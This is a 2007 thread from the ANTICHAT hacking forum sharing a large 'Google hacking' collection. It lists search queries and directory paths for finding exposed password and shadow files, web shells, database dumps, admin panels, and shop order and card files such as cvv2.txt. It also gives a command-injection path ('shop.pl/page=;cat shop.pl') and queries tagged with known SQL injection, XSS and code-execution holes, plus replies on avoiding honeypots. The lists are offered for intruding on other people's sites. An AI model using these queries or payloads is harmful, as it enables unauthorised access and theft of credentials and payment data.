ANTICHAT Forum


alextoun 30.08.2007 21:05

Mega Collection of Google Hacking
 
This seems to be not quite an article but rather Google queries, with which you can pull out so much junk of all kinds that you never even dreamed of it. (I think you know how to use this, since there have already been several superficial posts about it.)
So, let's get started.


Quote:

allinurl: "proxylist.txt"
allinurl: "proxy.txt"
"index of/root"
"auth_user_file.txt"
"index of/root"
"Index of /admin"
"Index of /password"
"Index of /mail"
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto
administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index
allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
for IIS server exploit
allinurl: winnt/system32/
and u’ll get many IIS server exploits
intitle:r57shell
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart
_vti_inf.html
service.pwd
users.pwd
authors.pwd
administrators.pwd
shtml.dll
shtml.exe
fpcount.exe
default.asp
showcode.asp
sendmail.cfm
getFile.cfm
imagemap.exe
test.bat
msadcs.dll
htimage.exe
counter.exe
browser.inc
hello.bat
default.asp\
dvwssr.dll
cart32.exe
add.exe
index.jsp
SessionServlet
glimpse
man.sh
AT-admin.cgi
AT-generate.cgi
inurl:/adpassword.txt
inurl:admin.dat
and even for shop sites:
inurl:/shop/db/
intitle:"index of/ shop" +db
intitle:"index of/" +shopping_cart
Quote:

"Index of /admin"
"Index of /password"
"Index of /mail"
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto

administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index

allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov

inurl:passwd filetype:txt
inurl:admin filetype:db
inurl:iisadmin
inurl:"auth_user_file.txt"
inurl:"wwwroot/*."


top secret site:mil
confidential site:mil

allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history

intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart
Many admins leave directories like these open:
Quote:

/orders
/Order
/Orders
/order
/config
/Admin_files
/mall_log_files
/PDG_Cart
PDG_Cart/order.log
PDG_Cart/shopper.conf
/pw
/store/customers
/store/temp_customers
/WebShop
/webshop
/WebShop/templates
/WebShop/logs
/cgi/PDG_Cart/order.log
/PDG_Cart/authorizenets.txt
/cgi-bin/PDG_Cart/mc.txt
/PDG/order.txt
/cgi-bin/PDG_cart/card.txt
/PDG_Cart/shopper.conf
/php/mlog.phtml
/php/mylog.phtml
/webcart/carts
/cgi-bin/orders.txt
/WebShop/logs
/cgi-bin/AnyForm2
/cgi-bin/mc.txt
/ccbill/secure/ccbill.log
/cgi-bin/orders/mc.txt
/WebCart/orders.txt
/cgi-bin/orders/cc.txt
/cvv2.txt
/cgi-bin/orderlog.txt
/WebShop/logs
/orderb/shop.mdb
/_private/shopping_cart.mdb
/scripts/iisadmin/tools/mkilog.exe
/cool-logs/mylog.html
/cool-logs/mlog.html
/easylog/easylog.html
/HyperStat/stat_what.log
/mall_log_files/
/scripts/weblog
/super_stats/access_logs
/trafficlog
/wwwlog
/Admin_files/order.log
/bin/orders/orders.txt
/cgi/orders/orders.txt
/cgi-bin/orders/orders.txt
/cgi-sys/orders/orders.txt
/cgi-local/orders/orders.txt
/htbin/orders/orders.txt
/cgibin/orders/orders.txt
/cgis/orders/orders.txt
/scripts/orders/orders.txt
/cgi-win/orders/orders.txt
/bin/pagelog.cgi
/cgi/pagelog.cgi
/cgi-bin/pagelog.cgi
/cgi-sys/pagelog.cgi
/cgi-local/pagelog.cgi
/cgibin/pagelog.cgi
/cgis/pagelog.cgi
/scripts/pagelog.cgi
/cgi-win/pagelog.cgi
/bin/DCShop/auth_data/auth_user_file.txt
/cgi/DCShop/auth_data/auth_user_file.txt
/cgi-bin/DCShop/auth_data/auth_user_file.txt
/cgi-sys/DCShop/auth_data/auth_user_file.txt
/cgi-local/DCShop/auth_data/auth_user_file.txt
/htbin/DCShop/auth_data/auth_user_file.txt
/cgibin/DCShop/auth_data/auth_user_file.txt
/cgis/DCShop/auth_data/auth_user_file.txt
/scripts/DCShop/auth_data/auth_user_file.txt
/cgi-win/DCShop/auth_data/auth_user_file.txt
/bin/DCShop/orders/orders.txt
/cgi/DCShop/orders/orders.txt
/cgi-bin/DCShop/orders/orders.txt
/cgi-sys/DCShop/orders/orders.txt
/cgi-local/DCShop/orders/orders.txt
/htbin/DCShop/orders/orders.txt
/cgibin/DCShop/orders/orders.txt
/cgis/DCShop/orders/orders.txt
/scripts/DCShop/orders/orders.txt
/cgi-win/DCShop/orders/orders.txt
/dc/auth_data/auth_user_file.txt
/dcshop/orders/orders.txt
/dcshop/auth_data/auth_user_file.txt
/dc/orders/orders.txt
/orders/checks.txt
/orders/mountain.cfg
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/webcart/carts
/webcart-lite/orders/import.txt
/webcart/config
/webcart/config/clients.txt
/webcart/orders
/webcart/orders/import.txt
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/bin/shop/auth_data/auth_user_file.txt
/cgi/shop/auth_data/auth_user_file.txt
/cgi-bin/shop/auth_data/auth_user_file.txt
/cgi-sys/shop/auth_data/auth_user_file.txt
/cgi-local/shop/auth_data/auth_user_file.txt
/htbin/shop/auth_data/auth_user_file.txt
/cgibin/shop/auth_data/auth_user_file.txt
/cgis/shop/auth_data/auth_user_file.txt
/scripts/shop/auth_data/auth_user_file.txt
/cgi-win/shop/auth_data/auth_user_file.txt
/bin/shop/orders/orders.txt
/cgi/shop/orders/orders.txt
/cgi-bin/shop/orders/orders.txt
/cgi-sys/shop/orders/orders.txt
/cgi-local/shop/orders/orders.txt
/htbin/shop/orders/orders.txt
/cgibin/shop/orders/orders.txt
/cgis/shop/orders/orders.txt
/scripts/shop/orders/orders.txt
/cgi-win/shop/orders/orders.txt
/bin/shop.pl/page=;cat%20shop.pl
/cgi/shop.pl/page=;cat%20shop.pl
/cgi-bin/shop.pl/page=;cat%20shop.pl
/cgi-sys/shop.pl/page=;cat%20shop.pl
/cgi-local/shop.pl/page=;cat%20shop.pl
/htbin/shop.pl/page=;cat%20shop.pl
/cgibin/shop.pl/page=;cat%20shop.pl
/cgis/shop.pl/page=;cat%20shop.pl
/scripts/shop.pl/page=;cat%20shop.pl
/cgi-win/shop.pl/page=;cat%20shop.pl
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/cgis/cart.pl
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/cgis/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/bin/cart32.exe
/cgi/cart32.exe
/cgi-bin/cart32.exe
/cgi-sys/cart32.exe
/cgi-local/cart32.exe
/htbin/cart32.exe
/cgibin/cart32.exe
/cgis/cart32.exe
/scripts/cart32.exe
/cgi-win/cart32.exe
/cgi-bin/www-sql;;;
/server%20logfile;;;
/cgi-bin/pdg_cart/order.log
/cgi-bin/shopper.exe?search
/orders/order.log
/orders/import.txt
/orders/checks.txt
/orders/orders.txt
/Orders/order.log
/order/order.log
/WebShop/logs/ck.log
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/_private/orders.txt
In these directories we can often find files such as:

Quote:

orders.txt
order.txt
import.txt
checks.txt
order_log
order.log
orders.log
orders_log
log_order
log_orders
temp_order
temp_orders
order_temp
robots.txt
admin.mdb
user_file.txt
and so on and so forth.

Note that this is far from everything.
And even from this you can pull out a great deal.
Use your imagination :)

a1ex 30.08.2007 21:20

Hm... I came across a link; it may be the same thing, but IMHO there is something to add from there:
Code:

http://gray-world.net/etc/passwd/googletut1.txt

Фещ 30.08.2007 21:23

Well done for gathering it all together ) It will come in handy )

WAR!9G 30.08.2007 22:07

No offense, but that's exactly it:
Quote:

you can pull out so much junk of all kinds
.. you will hardly manage to dig up anything really interesting. A plus for the effort ;)

T0p 30.08.2007 22:23

Heh, you could dig in the direction of backups, dumps and other things like users.sql.

fly 30.08.2007 22:32

Code:

comment:advisories and vulnerabilities*-----
"1999-2004 FuseTalk Inc" -site:fusetalk.com
"2003 DUware All Rights Reserved"
"Active Webcam Page" inurl:8080
"BlackBoard 1.5.1-f | © 2003-4 by Yves Goergen"
"BosDates Calendar System " "powered by BosDates v3.2 by BosDev"
"Copyright © 2002 Agustin Dondo Scripts"
"delete entries" inurl:admin/delete.asp
"driven by: ASP Message Board"
"Enter ip" inurl:"php-ping.php"
"IceWarp Web Mail 5.3.0" "Powered by IceWarp"
"Ideal BB Version: 0.1" -idealbb.com
"inurl:/site/articles.asp?idcategory="
"Obtenez votre forum Aztek" -site:forum-aztek.com
"Online Store - Powered by ProductCart"
"Powered *: newtelligence" ("dasBlog 1.6"| "dasBlog 1.5"| "dasBlog 1.4"|"dasBlog 1.3")
"Powered by A-CART"
"Powered by AJ-Fork v.167"
"powered by antiboard"
"Powered by Coppermine Photo Gallery"
"Powered by CubeCart"
"Powered by DCP-Portal v5.5"
"Powered by DMXReady Site Chassis Manager" -site:dmxready.com
"Powered by FUDforum"
"Powered by Gallery v1.4.4"
"Powered by IceWarp Software" inurl:mail
"Powered by Ikonboard 3.1.1"
"Powered by Megabook *" inurl:guestbook.cgi
"Powered by MercuryBoard [v1"
"powered by minibb" -site:www.minibb.net -intext:1.7f
"Powered by My Blog" intext:"FuzzyMonkey.org"
"Powered by ocPortal" -demo -ocportal.com
"powered by phpWebSite" 0.9-3-2...4
"Powered by PowerPortal v1.3"
"powered by vbulletin 3.0"
"Powered by WordPress" -html filetype:php -demo -wordpress.org -bugtraq
"Powered by WowBB" -site:wowbb.com
"Powered by YaPig V0.92b"
"Powered by yappa-ng"
"running: Nucleus v3.1" -.nucleuscms.org -demo
"SquirrelMail version 1.4.4" inurl:src ext:php
"This page has been automatically generated by Plesk Server Administrator"
+"Powered by Invision Power Board v2.0.0..2"
+"Powered by phpBB 2.0.6..10" -phpbb.com -phpbb.pl
inurl:"dispatch.php?atknodetype" | inurl:class.at -----Achievo webbased project management-----
allintitle:aspjar.com guestbook
inurl:"/becommunity/community/index.php?pageurl=" -----E-market remote code execution-----
inurl:custva.asp -----EarlyImpact Productcart-----
ext:php intext:"Powered by phpNewMan Version"
ext:pl inurl:cgi intitle:"FormMail *" -"*Referrer" -"* Denied" -sourceforge -error -cvs -input
filetype:cgi inurl:nbmember.cgi
filetype:cgi inurl:pdesk.cgi
filetype:cgi inurl:tseekdir.cgi
filetype:php inurl:index.php inurl:"module=subjects" inurl:"func=*" (listpages| viewpage | listcat)
intext:("UBB.threads™ 6.2"|"UBB.threads™ 6.3") intext:"You * not logged *" -site:ubbcentral.com
intitle:"EMUMAIL - Login" "Powered by EMU Webmail"
intitle:"MRTG/RRD" 1.1* (inurl:mrtg.cgi | inurl:14all.cgi |traffic.cgi)
intitle:"View Img" inurl:viewimg.php
intitle:"WebJeff - FileManager" intext:"login" intext:Pass|PAsse
intitle:"WordPress > * > Login form" inurl:"wp-login.php"
intitle:guestbook "advanced guestbook 2.2 powered"
intitle:welcome.to.horde
inurl:"/cgi-bin/loadpage.cgi?user_id="
inurl:"/site/articles.asp?idcategory="
inurl:"comment.php?serendipity"
inurl:"messageboard/Forum.asp?"
inurl:"slxweb.dll"
inurl:/SiteChassisManager/
inurl:cal_make.pl
inurl:citrix/metaframexp/default/login.asp? ClientDetection=On
inurl:comersus_message.asp
inurl:directorypro.cgi
inurl:gotoURL.asp?url=
inurl:technote inurl:main.cgi*filename=*
inurl:ttt-webmaster.php
inurl:wiki/MediaWiki
"Powered by Invision Power Board(U) v1.3 Final" -----Invision Power Board SSI.PHP SQL Injection-----
"Powered by mnoGoSearch - free web search engine software" -----nGoSearch vulnerability-----
"FC Bigfeet" -inurl:mail -----Quicksite demopages for Typo3-----
inurl:com_remository -----ReMOSitory module for Mambo-----
uploadpics.php?did= -forumintext:Generated.by.phpix.1.0? inurl:$mode=album
"Powered by: vBulletin * 3.0.1" inurl:newreply.php -----vBulletin version 3.0.1 newreply.php XSS-----
filetype:asp inurl:"shopdisplayproducts.asp" -----VP-ASP Shopping Cart XSS-----
inurl:/cgi-bin/index.cgi inurl:topics inurl:viewcat= +intext:"WebAPP" -site:web-app.org -----WebAPP directory traversal-----
"FrontPage-" inurl:service.pwd
" Dumping data for table"
"phpMyAdmin MySQL-Dump" filetype:txt
"1999-2004 FuseTalk Inc" -site:fusetalk.com
"4images Administration Control Panel"
"ASP.NET_SessionId" "data source="
"Active Webcam Page" inurl:8080
"AnWeb/1.42h" intitle:index.of
"BlackBoard 1.5.1-f | © 2003-4 by Yves Goergen"
"CERN httpd 3.0B (VAX VMS)"
"Certificate Practice Statement" inurl:(PDF | DOC)
"Copyright (c) Tektronix, Inc." "printer status"
"Enter ip" inurl:"php-ping.php"
"FC Bigfeet" -inurl:mail
"File Upload Manager v1.3" "rename to"
"HTTP_FROM=googlebot" googlebot.com "Server_Software="
"IMail Server Web Messaging" intitle:login
"Ideal BB Version: 0.1" -idealbb.com
"Incorrect syntax near"
"Index of /backup"
"Index of" rar r01 nfo Modified 2004
"Internal Server Error" "server at"
"JRun Web Server" intitle:index.of
"Login to Usermin" inurl:20000
"MaXX/3.1" intitle:index.of
"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)" ext:log
"Microsoft-IIS/* server at" intitle:index.of
"Microsoft-IIS/5.0 server at"
"More Info about MetaCart Free"
"Netware * Home" inurl:nav.html
"Network Vulnerability Assessment Report"
"OPENSRS Domain Management" inurl:manage.cgi
"ORA-00933: SQL command not properly ended"
"ORA-12541: TNS:no listener" intitle:"error occurred"
"OmniHTTPd/2.10" intitle:index.of
"OpenSA/1.0.4" intitle:index.of
"Phaser 6250" "Printer Neighborhood" "XEROX CORPORATION"
"Phaser® 740 Color Printer" "printer named: "
"Phorum Admin" "Database Connection" inurl:forum inurl:admin
"Powered *: newtelligence" ("dasBlog 1.6"| "dasBlog 1.5"| "dasBlog 1.4"|"dasBlog 1.3")
"Powered by A-CART"
"Powered by Coppermine Photo Gallery"
"Powered by DCP-Portal v5.5"
"Powered by Duclassified" -site:duware.com
"Powered by Dudirectory" -site:duware.com
"Powered by Gallery v1.4.4"
"Powered by Ikonboard 3.1.1"
"Powered by Invision Power File Manager" (inurl:login.php) | (intitle:"Browsing directory /" )
"Powered by Link Department"
"Powered by MercuryBoard [v1"
"Powered by PHPFM" filetype:php -username
"Powered by WordPress" -html filetype:php -demo -wordpress.org -bugtraq
"Powered by YaPig V0.92b"
"Powered by ocPortal" -demo -ocportal.com
"Powered by yappa-ng"
"Red Hat Secure/2.0"
"Request Details" "Control Tree" "Server Variables"
"Select a database to view" intitle:"filemaker pro"
"SquirrelMail version 1.4.4" inurl:src ext:php
"Supplied argument is not a valid MySQL result resource"
"Switch to table format" inurl:table|plain
"SysCP - login"
"The script whose uid is " "is not allowed to access"
"This file was generated by Nessus"
"This page has been automatically generated by Plesk Server Administrator"
"This report was generated by WebLog"
"Unclosed quotation mark before the character string"
"VNC Desktop" inurl:5800
"Warning: Cannot modify header information - headers already sent"
"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL"
allinurl:/examples/jsp/snp/snoop.jsp
allinurl:index.htm?cus?audio
allinurl:install/install.php
allinurl:intranet admin
allinurl:servlet/SnoopServlet
axis storpoint "file view" inurl:/volumes/
buddylist.blt
camera linksys inurl:main.cgi
comment:Files containing juicy info***]
comment:Files containing usernames
comment:Pages containing login portals
comment:Sensitive Directories***]
comment:Various online devices
comment:Vulnerable servers
comment:advisories and vulnerabilities
data filetype:mdb -site:gov -site:mil
databasetype. Code : 80004005. Error Description
e-mail address filetype:csv csv
eggdrop filetype:user user
etc (index.of)
ext:asp inurl:DUgallery intitle:"3.0" -site:dugallery.com -site:duware.com
ext:asp inurl:pathto.asp
ext:cgi intext:"nrg-" " This web page was created on "
ext:cgi inurl:editcgi.cgi inurl:file=
ext:cgi inurl:ubb6_test.cgi
ext:conf inurl:rsyncd.conf -cvs -man
ext:gho gho
ext:ini eudora.ini
ext:ini intext:env.ini
ext:ldif ldif
ext:log "Software: Microsoft Internet Information Services *.*"
ext:mdb inurl:*.mdb  inurl:fpdb shop.mdb
ext:nsf nsf -gov -mil
ext:php intext:"Powered by phpNewMan Version"
ext:pl inurl:cgi intitle:"FormMail *" -"*Referrer" -"* Denied" -sourceforge -error -cvs -input
ext:reg "username=*" putty
ext:txt inurl:dxdiag
ext:vmx vmx
ezBOO "Administrator Panel" -cvs
filetype:QDF QDF
filetype:asp "Custom Error Message" Category Source
filetype:asp DBQ=" * Server.MapPath("*.mdb")


Mo4x 31.08.2007 02:04

PHP code:



Фещ 31.08.2007 02:06

I've already run into a honeypot twice! Use these carefully!

nbd 31.08.2007 05:46

Quote:

Posted by Фещ
I've already run into a honeypot twice! Use these carefully!

Yes, there really is a lot of "honey" :)
For the most part, honeypots give themselves away with an abundance of "holes": if the files password.txt, passwd, admin_password, users.txt (within a single directory) and so on appear before your eyes, you can be 100% sure it is a honeypot :)

The_HuliGun 31.08.2007 09:44

You're wasting your effort; all of this was collected long before you.
A must-see for all Google hackers

